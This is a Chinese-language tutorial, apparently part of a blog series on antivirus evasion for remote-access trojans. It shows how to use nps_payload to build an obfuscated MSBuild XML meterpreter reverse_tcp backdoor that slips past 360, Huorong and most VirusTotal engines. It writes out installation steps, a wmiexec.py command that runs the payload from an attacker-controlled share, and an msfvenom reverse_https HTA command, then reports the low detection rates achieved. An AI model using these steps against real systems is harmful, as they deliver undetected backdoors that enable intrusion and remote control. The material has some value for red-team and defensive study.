免殺能力一覽表

幾點(diǎn)說明：

1、上表中標(biāo)識 √ 說明相應(yīng)殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機(jī)測試時(shí)只是安裝了360全家桶和火絨，所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動(dòng)態(tài)查殺。360殺毒版本5.0.0.8160(2020.01.01)，火絨版本5.0.34.16(2020.01.01)，360安全衛(wèi)士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標(biāo)是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態(tài)查殺能力，數(shù)據(jù)僅供參考，不足以作為免殺或殺軟查殺能力的判斷指標(biāo)。

5、完全不必要苛求一種免殺技術(shù)能bypass所有殺軟，這樣的技術(shù)肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實(shí)我們只要能bypass目標(biāo)主機(jī)上的殺軟就足夠了。

一、nps_payload介紹

nps_payload是2017年開源的工具，安裝使用都比較簡單,nps_payload可以生成基于msbuild的xml文件和獨(dú)立執(zhí)行的hta文件，并對xml文件和hta文件做了一定的混淆免殺，從而達(dá)到免殺的效果。

二、安裝nps_payload

1、克隆到本地

git clone https://github.com/trustedsec/nps_payload

2、安裝py依賴

pip install -r requirements.txt

3、運(yùn)行python nps_payload.py

三、nps_payload使用說明

nps_payload生成的xml或hta文件都需要使用msbuild來執(zhí)行。

Microsoft Build Engine是一個(gè)用于構(gòu)建應(yīng)用程序的平臺(tái)，此引擎也被稱為msbuild，它為項(xiàng)目文件提供一個(gè)XML模式，該模式控制構(gòu)建平臺(tái)如何處理和構(gòu)建軟件。Visual Studio使用MSBuild，但它不依賴于Visual Studio。通過在項(xiàng)目或解決方案文件中調(diào)用msbuild.exe，可以在未安裝Visual Studio的環(huán)境中編譯和生成程序。

說明：Msbuild.exe所在路徑?jīng)]有被系統(tǒng)添加PATH環(huán)境變量中，因此，Msbuild命令無法直接在cmd中使用。需要帶上路徑：C:\Windows\Microsoft.NET\Framework\v4.0.30319。

適用條件:.NET Framework>=4.0

nps_payload對xml文件和hta文件做的一些免殺是比較直接有效的：

三、利用nps_payload生成后門

我就以生成基于msbuild的xml文件為例進(jìn)行演示。

執(zhí)行python nps_payload.py，選擇1，Generate msbuild/nps/msf payload

第2步payload選擇1，windows/meterpreter/reverse_tcp

后面輸入監(jiān)聽IP和端口

之后可生成后門文件

我們需要用到的只有msbuild_nps.xml這一個(gè)文件

msbuild_nps.xml文件內(nèi)容如下，命令經(jīng)過了編碼處理

文件的執(zhí)行方式有兩種

1. 本地加載執(zhí)行: - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml2. 遠(yuǎn)程文件執(zhí)行:wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

我這里就用本地加載進(jìn)行測試，msbuild.exe在windows中的的一般路徑為C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe

msfconsole監(jiān)聽相應(yīng)payload和端口，可正常上線

打開殺軟進(jìn)行測試

virustotal.com上查殺率為3/56

使用nps_payload生成的hta文件，virustotal.com上查殺率為7/57。(msf直接生成的hta-psh文件查殺為28/57,msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test.hta)

四、nps_payload小結(jié)

基于白名單的執(zhí)行payload侯亮大神講的比較多了，nps_payload只是使用了其中的msbuild.exe方法，nps_payload還對生成的文件進(jìn)行了混淆處理，使用非常簡單，免殺效果也是不錯(cuò)的。

五、參考資料

官方Github：https://github.com/trustedsec/nps_payload

基于白名單Msbuild.exe執(zhí)行payload第一季：https://micro8.gitbook.io/micro8/contents-1/71-80/71-ji-yu-bai-ming-dan-msbuild.exe-zhi-hang-payload-di-yi-ji

使用msbuild.exe繞過應(yīng)用程序白名單（多種方法）:https://www.cnblogs.com/backlion/p/10490573.html

總結(jié)

以上是生活随笔為你收集整理的远控免杀专题(19)-nps_payload免杀的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。